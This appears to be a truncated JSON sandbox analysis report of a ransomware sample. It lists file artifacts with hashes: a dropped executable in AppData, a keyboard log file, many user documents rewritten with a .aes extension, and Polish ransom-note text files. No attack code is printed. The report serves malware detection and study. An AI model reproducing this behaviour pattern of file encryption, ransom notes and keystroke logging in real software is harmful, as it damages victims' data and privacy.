{ "analysis_details": { "creation_time": "2017-10-16 16:26 (UTC+2)", "execution_successful": true, "number_of_processes": 41, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:02:37" }, "artifacts": { "files": [ { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "powershell.exe", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\powershell.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\nvss.exe", "hashes": [ { "md5_hash": "36040c85f7aa54e66fd6ed5e7bf298dd", "sha1_hash": "55b6e9b15003770842395be3e0d55ac477537ddd", "sha256_hash": "aac8a8f087e8acfa9acd6e40ca4ee5b5c42f82e4e4f4633268b0bb91cf76de1d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\nvss.exe", "operations": [ "access", "write", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW", "hashes": [], "norm_filename": "c:\\users\\kft6utqw", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Keyboard\\17102017_012722.log", "hashes": [ { "md5_hash": "a1fb0cacc1cee630641b508b2086b7a9", "sha1_hash": "064cf6477e359f9084098da05bc974b1147f16f4", "sha256_hash": "6426309787950c45434ce8d35229ff32437868cc6c437c397625061cb788ec81", "type": "file_hash", "version": 1 }, { "md5_hash": "2aed3869dc90e2c688b00a7f76050ece", "sha1_hash": "8e22e62dc5916fd9001262d356461644de9e1c48", "sha256_hash": "a25b97ccc667cf1fa3df95fd22c16f8f20c7671ef5e29ffc7424ee3f08124538", "type": "file_hash", "version": 1 }, { "md5_hash": "b637d1056fb3a64637527b0de3c2722a", "sha1_hash": "8ef4b8b0fe397f596922aae624c4c61cea02ac35", "sha256_hash": "2cb8d99c2bf5b5b73e03e8690a5e981f547e4e1aad2aacae16f9e03124537c38", "type": "file_hash", "version": 1 }, { "md5_hash": "d64d152896c18c6c805a792270a2df0f", "sha1_hash": "c859282002c93ab665ae07992074214b328caf50", "sha256_hash": "0bda07e2a3283ef8f30d50ddd1fc99b854a1d86c497fcd2572dfb2d65b46192e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\keyboard\\17102017_012722.log", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\nVO-4P-KzZ-c6DO0e\\1BUS.odt.aes", "hashes": [ { "md5_hash": "f2cab558712cd7186fcf61d6f3787620", "sha1_hash": "40a933423897a3f92306a5881ac01c9181ca9afd", "sha256_hash": "a3c45f43e438c138ca658fbb4e05734d8c15acce65427bec9135f091c2730593", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\nvo-4p-kzz-c6do0e\\1bus.odt.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\nVO-4P-KzZ-c6DO0e\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "cbe0aa03a088135610ec0779aba641c5", "sha1_hash": "9b36102fabaf1599b4f6f5f52c2645e3194aba67", "sha256_hash": "10b7fb47b1daca2e850685089a4099b1e3e6b95e57d062434dff57a0ac2727a6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\nvo-4p-kzz-c6do0e\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\nVO-4P-KzZ-c6DO0e\\b-s_mvDIaHRjA WonYD7.csv.aes", "hashes": [ { "md5_hash": "dbcb43a9798c0304870a937e10d2b081", "sha1_hash": "f1a7ef9a881ffa6185da630da6e884b11bbb5260", "sha256_hash": "9f939c63edf1a9169fd470cda68210ed428d86ca83cb9037c322f93c3c53929c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\nvo-4p-kzz-c6do0e\\b-s_mvdiahrja wonyd7.csv.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\3fRpiUpvJo9PXh.doc.aes", "hashes": [ { "md5_hash": "da8d033bbbe5b451eac7b4ac77ee0d16", "sha1_hash": "34e0c518033bb64058b612e7ceeb20578d5ca2cd", "sha256_hash": "b6182e025ca557bb2c1538d2d498ff163ec0bbca095149619f716358627077b8", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\3frpiupvjo9pxh.doc.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "cbe0aa03a088135610ec0779aba641c5", "sha1_hash": "9b36102fabaf1599b4f6f5f52c2645e3194aba67", "sha256_hash": "10b7fb47b1daca2e850685089a4099b1e3e6b95e57d062434dff57a0ac2727a6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\7wlDZE9WQQHKod.odp.aes", "hashes": [ { "md5_hash": "4420d02ae796332100cb6fb22d53981e", "sha1_hash": "cc3baed9e423ca7029a69b5e05e7343f6b0fc22e", "sha256_hash": "8bab0ee1a1e2d309eaf3bf055575b00828bb0f5ebab96a0ac6ae61f7c82ef4b4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\7wldze9wqqhkod.odp.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\hvCemxS1iSlcK.doc.aes", "hashes": [ { "md5_hash": "2097ab114a5b50c789d3d41038337434", "sha1_hash": "1c42f8ae3849e66b3ac412a8dc101c63ed2459ba", "sha256_hash": "c18f2f582daa67496f9d55aacf60e3edb9dc74eadb1f3875af33ced36447f206", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\hvcemxs1islck.doc.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\pA730znoL5.rtf.aes", "hashes": [ { "md5_hash": "58bf0255677de942755ea7b7dbcfaf10", "sha1_hash": "f60e537f2659ce20ce8b8f86092ffce3ba47bba6", "sha256_hash": "413416e46b46964f5d0fb72b330ffc5d7ac3c49bcfa6826cc9d04e70137aab25", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\pa730znol5.rtf.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\_X864G9NgHeHTp16YW.ods.aes", "hashes": [ { "md5_hash": "46f2018c9afedc0f7cd8ceddb2e00e95", "sha1_hash": "88ebb09b8b4b916f0bd5118e7ffb84b04880953f", "sha256_hash": "2a99f7ac23b8090ab9004e5268c8381c66e4c13b8c6222260b645bb862a8e360", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\_x864g9nghehtp16yw.ods.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\0qp cbTp2kDuTxPhn8y.csv.aes", "hashes": [ { "md5_hash": "1dd5743b7642ab3f7ebf23a2c4d11bed", "sha1_hash": "0fa780b46783b4d6d02c2fcdcc76e380964a8072", "sha256_hash": "48ed4ee93ac7712258e9692ffe388ffde95f41234bfbcf39de333d1478ce63fb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\0qp cbtp2kdutxphn8y.csv.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "0b5f0f80cc4b36b483bb621bb425c777", "sha1_hash": "933d96b6b6f3953641eb927871482d46a68587b1", "sha256_hash": "e4841e111ff327774b47d7a880fc5ef644885929615b1a9b3ac325cf2ddcf0a4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\F6P3h-e5k60SlJ.pdf.aes", "hashes": [ { "md5_hash": "f8023e58ab11fa5ef5e9f6a263d672a3", "sha1_hash": "a886ac508b0e21b56829e27c1a68504a3bc25cf5", "sha256_hash": "c32e2e5fae3a1ba9c7ac5afb2e44ee719a2a7d79a06a25206ce41997d3693e1c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\f6p3h-e5k60slj.pdf.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\iUfdaFezBB3P- l4I3e.rtf.aes", "hashes": [ { "md5_hash": "28ebc3a1b1fe94cc03f43f3cdd76b961", "sha1_hash": "40915812c97a291642b009625b59bddb3c09530d", "sha256_hash": "71425428390900f936b53991578c19e2161a143028209a919e297476d51db896", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\iufdafezbb3p- l4i3e.rtf.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\pWQHqSJInPvfKbJkRZb.rtf.aes", "hashes": [ { "md5_hash": "663b3cb0a0ffde4211d6099d1d744572", "sha1_hash": "6cdfff84c93a0cde5805a2fe81a4f27d223daba0", "sha256_hash": "97ec7a84cbf36bc41d4a6ec973f3f76c725b5129ab814c7d93c56647b3f8739b", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\pwqhqsjinpvfkbjkrzb.rtf.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\t8rijBa3r5rIl.pptx.aes", "hashes": [ { "md5_hash": "ab4d82455547a815c43ed9c055badce6", "sha1_hash": "8bb40d5459ee9726d3728cd4c76fa35e800f5c5e", "sha256_hash": "8b3bcab35f8e11efb3807baa8785328322c03f0145f863422525df5e87ba0c76", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\t8rijba3r5ril.pptx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\0_b3IJRL61ikm2.xls.aes", "hashes": [ { "md5_hash": "8e4cc4c2b7762bb926abbb3007736831", "sha1_hash": "d6d246bc12fcb5e67e121caf52d07feb6cce47ec", "sha256_hash": "8228409efa8aa583936fd32c6b3137ca5e4677c4c2c0cfaadd5a8e21cc54a2f3", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\0_b3ijrl61ikm2.xls.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "b862b4250082ea6c4db185c4068292b4", "sha1_hash": "3637ded2b5a9eb6beb9cf479ffe1324a240c8880", "sha256_hash": "a81c24f504e998f5a0003223d74aeb74f0a4ecf81f06e979a4b468bc2c847bfc", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\568WxqKDq_FIMwoN.pdf.aes", "hashes": [ { "md5_hash": "247b667d9fb0fc8b2eeb7f6b8dd15360", "sha1_hash": "86aea694a1065a8a261b8b878c25bedd8c5d5cdf", "sha256_hash": "c6a0aca2c5b19931f50fa52b0e3f24f854d7d5516ceac0983bb169d1de30d9bd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\568wxqkdq_fimwon.pdf.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\8m1FCp.ots.aes", "hashes": [ { "md5_hash": "c3fa5deca0032d11062c098aca043806", "sha1_hash": "f29cdcc56481817d3507edbc5a67c188074d467d", "sha256_hash": "180f9e94819f02c6b8ff6e3d093973c16cc869c8e0871a429e312a85c235aed5", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\8m1fcp.ots.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\p2QHvHrC07x 6M.odt.aes", "hashes": [ { "md5_hash": "1c97627a6dbb86fd651e5a2ecdd1c439", "sha1_hash": "7b682fcff36969b9c76b2b879668c588dca05da9", "sha256_hash": "7dd3b123673fe046879e00ef60e78482ee4b53411830fe23ee03dce07644d068", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p2qhvhrc07x 6m.odt.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\URm66b8mfK_B.docx.aes", "hashes": [ { "md5_hash": "d9ea2dd5cc2040cebb83b1202a21bcc8", "sha1_hash": "d523dea27e8e78cfc129ad6e4c79f03681956d05", "sha256_hash": "b805ff00bed7062529f73f3bd639421542860dbadfcd7fd470743ffa0054f1f7", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\urm66b8mfk_b.docx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\vfwuhDCvzF0GRto.pptx.aes", "hashes": [ { "md5_hash": "e703703b34b46197760b09e17cf8df6a", "sha1_hash": "78f113ba271b320ebb256029640d38633fdfa053", "sha256_hash": "179ef98c877640d95d681751c615cfd7cc26cb6735ad9dabbe158c20ffc95082", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\vfwuhdcvzf0grto.pptx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\wVF JPe1b.xls.aes", "hashes": [ { "md5_hash": "760f9fb0025e83f024a3cf667642a529", "sha1_hash": "4b9e921ca48b9204bd2f0d15a22b77492363d379", "sha256_hash": "c7946be6a97b1d1b8136be5226cbd00c1d01543afb780a5341d07fc9eb89d5d9", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\wvf jpe1b.xls.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\qa6QFkq\\n1mKD81VKeIa7S2.rtf.aes", "hashes": [ { "md5_hash": "8a8c0f566668e1b12b7fc374828700ec", "sha1_hash": "36a31257d40b8f92f2f6cb1c3baabf73c0f2f3fe", "sha256_hash": "e6b2fd1d505f8752f242990ec1d3d79eae59bd57fef2b63aada93d2c531254de", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\n1mkd81vkeia7s2.rtf.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\qa6QFkq\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "f9ae75622ad7932bde701dd30af9ab14", "sha1_hash": "27afb65304d50a280fe85b6b8986766c6adf77f2", "sha256_hash": "866ea96120ab6a005968d8c52e61bec38d7bd6d57c5c88ce4ea616167c2322b7", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaminghhfhqi2h.wln.bat", "hashes": [ { "md5_hash": "2cf00a0b576815e19471a6cfe7a0d898", "sha1_hash": "dee9eab29048d71fc2c04bf18edb260bf12fb84e", "sha256_hash": "1aaedbc63631dcece73558d47f1f587bf001ffd0d2bcfabd53fd220145238cbd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaminghhfhqi2h.wln.bat", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\qa6QFkq\\ORRmspMNhOgtvaB.doc.aes", "hashes": [ { "md5_hash": "861e60657aebfcc7642f866b5a0a750a", "sha1_hash": "b75956081f84bff389f8fa4f973f4a347244584b", "sha256_hash": "2f5acaae23f5533756bebe73f7bbadbc5246b0ffe98e1116ef305d0e69e622bb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\orrmspmnhogtvab.doc.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\qa6QFkq\\PP5 bxjS.pptx.aes", "hashes": [ { "md5_hash": "86c2590421d0d348a200f05dc4e7c4ad", "sha1_hash": "23604d488a32495bb3421425f4e7cfa19fba158b", "sha256_hash": "d7834715834fdb5e81ac4cb8101fcc07dca7426c95f47c8fd084518da41f816e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\pp5 bxjs.pptx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\qa6QFkq\\xlyLS6yx0MIco1.pps.aes", "hashes": [ { "md5_hash": "2a7bfc3cf0f4fbe0577883b7d30b24d1", "sha1_hash": "279fa16faa121754dd7c8b8473384753fa6678cc", "sha256_hash": "0ee488c057b7eb0dea6fd92d10c54e4af2702a575372f8ce9c037cb3465c9dd4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\xlyls6yx0mico1.pps.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\-GJqEDw.odt.aes", "hashes": [ { "md5_hash": "456eed0508e2413c39b2b8d84675eaca", "sha1_hash": "5096048a6c050f8a854d340602ede89a93ed4a99", "sha256_hash": "4da6555871ca52baf7e32a27f507ed24c51ee682c510f203f5f2c25ed1d95654", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\-gjqedw.odt.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "8886e301646afb67cb7813dc0f7e02cf", "sha1_hash": "d88cd92273a6ebdcb2f15397f26538225f72b569", "sha256_hash": "088385cb2c06a411ad885942c2622cfe1a5019eb813d8c864c6e9f207dd8996e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\8pUhJoF5OUB0zF3kJ4pk.ods.aes", "hashes": [ { "md5_hash": "f736d4fe414d5a96da5d318e17003b7a", "sha1_hash": "8f540830fa6292849ed7e1e7467a9913dae51d65", "sha256_hash": "23a952ff47965e370d1e0734bb24e961d17f388a0bcb699812214ad374293809", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\8puhjof5oub0zf3kj4pk.ods.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\eQOV.odp.aes", 